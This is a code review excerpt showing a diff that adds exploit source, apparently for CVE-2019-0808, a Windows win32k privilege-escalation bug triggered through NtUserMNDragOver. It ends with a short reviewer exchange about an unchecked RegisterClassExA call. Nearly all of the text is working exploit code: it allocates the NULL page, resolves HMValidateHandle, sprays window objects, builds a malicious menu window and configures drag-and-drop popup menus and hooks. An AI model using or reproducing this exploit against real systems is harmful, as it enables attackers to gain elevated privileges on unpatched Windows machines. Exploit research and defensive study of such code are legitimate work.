external/source/exploits/CVE-2019-0808/NtUserMNDragOverExploit/dllmain.cpp

```diff
@@ -0,0 +1,686 @@
+
+	// Create the primary popup menu and its submenu
+	HMENU hMenuRoot = CreatePopupMenu();
+	HMENU hMenuSub = CreatePopupMenu();
+
+	// Get a HINSTANCE handle to the current process.
+	HINSTANCE hInst = GetModuleHandleA(NULL);
+
+	// Get the address of NtAllocateVirtualMemory from ntdll.dll's export table.
+	pfnNtAllocateVirtualMemory = (NTAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
+
+	// Set the window hook and the event hook.
+	SetWindowsHookEx(WH_CALLWNDPROC, (HOOKPROC)WindowHookProc, hInst, GetCurrentThreadId());
+	SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, hInst, DisplayEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0);
+
+	// Set up the buffers for the call to NtUserMNDragOver().
+	CHAR buf[0x100] = { 0 };
+	POINT pt;
+	pt.x = 2;
+	pt.y = 2;
+
+	// Allocate the NULL page. If this fails, exit the program.
+	if (allocateNullPage() == FALSE) {
+		dprintf("[!] Couldn't allocate the NULL page!\r\n");
+	}
+	else {
+		dprintf("[*] Allocated the NULL page!\r\n");
+	}
+
+	// Just to be sure that these modules are loaded, lets load them again.
+	// Also allows the attacker to grab the address where user32.dll is loaded in memory.
+	HMODULE hUser32 = LoadLibraryW(L"user32.dll");
+	LoadLibraryW(L"gdi32.dll");
+
+	// Find the address of HMValidateHandle using the address of user32.dll
+	if (findHMValidateHandleAddress(hUser32) == FALSE) {
+		dprintf("[!] Couldn't locate the address of HMValidateHandle!\r\n");
+		ExitProcess(-1);
+	}
+
+	// Spray the windows and find two that are less than 0x3fd00 apart in memory.
+	if (sprayWindows() == FALSE) {
+		dprintf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n");
+		ExitProcess(-1);
+	}
+
+	// Create the malicious window, which will have its spMenu field set to NULL.
+	hWndFakeMenu = CreateWindowA("#32768", "MN", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, hInst, nullptr);
+	dprintf("[*] FakeMenu: %p \n", hWndFakeMenu);
+
+	// Change the menu settings for the two popup menus so that they are drag and drop enabled.
+	MENUINFO mi = { 0 };
+	mi.cbSize = sizeof(MENUINFO);
+	mi.fMask = MIM_STYLE;
+	mi.dwStyle = MNS_MODELESS | MNS_DRAGDROP;
+	SetMenuInfo(hMenuRoot, &mi);
+	SetMenuInfo(hMenuSub, &mi);
+
+	// Set up the hMenuRoot popupmenu to be the root popup menu which will display hMenuSub when selected.
+	AppendMenuA(hMenuRoot, MF_BYPOSITION | MF_POPUP, (UINT_PTR)hMenuSub, "Root");
+	AppendMenuA(hMenuSub, MF_BYPOSITION | MF_POPUP, 0, "Sub");
+
+	// Create the class wndClass, set its window procedure to DefWindowProc(), and then create hWndMain using this class.
+	WNDCLASSEXA wndClass = { 0 };
+	wndClass.cbSize = sizeof(WNDCLASSEXA);
+	wndClass.lpfnWndProc = DefWindowProc;
+	wndClass.cbClsExtra = 0;
+	wndClass.cbWndExtra = 0;
+	wndClass.hInstance = hInst;
+	wndClass.lpszMenuName = 0;
+	wndClass.lpszClassName = "WNDCLASSMAIN";
+	RegisterClassExA(&wndClass);

```

Comment:
`RegisterClassExA` can fail Grant....idk why I didn't check this when I originally wrote this code...

Reply:
Skipping this as upon further inspection later calls should fail and I have checks for them if this fails, and checking this is actually a lot more complicated than it looks and just not worth the time when later checks should catch any issues.